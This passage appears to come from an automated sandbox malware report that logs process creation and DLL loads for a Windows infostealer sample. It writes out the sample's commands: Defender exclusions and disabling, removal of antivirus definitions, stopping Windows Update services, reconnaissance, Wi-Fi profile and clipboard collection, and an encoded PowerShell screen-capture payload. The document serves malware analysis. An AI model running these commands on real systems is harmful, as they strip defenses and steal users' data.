BhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: unknown	Process created: C:\Recovery\HpQPPZazcv.exe C:\Recovery\HpQPPZazcv.exe
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: unknown	Process created: C:\Recovery\HpQPPZazcv.exe C:\Recovery\HpQPPZazcv.exe
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC3.tmp" "c:\Users\user\AppData\Local\Temp\eodmidm4\CSC7CD01418C841459A9A462A9B35F4C645.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\ProgramData\svchost.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6DA.tmp" "c:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC3.tmp" "c:\Users\user\AppData\Local\Temp\eodmidm4\CSC7CD01418C841459A9A462A9B35F4C645.TMP"

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: libffi-7.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: libcrypto-1_1.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: libssl-1_1.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: sspicli.dll	Jump to behavior
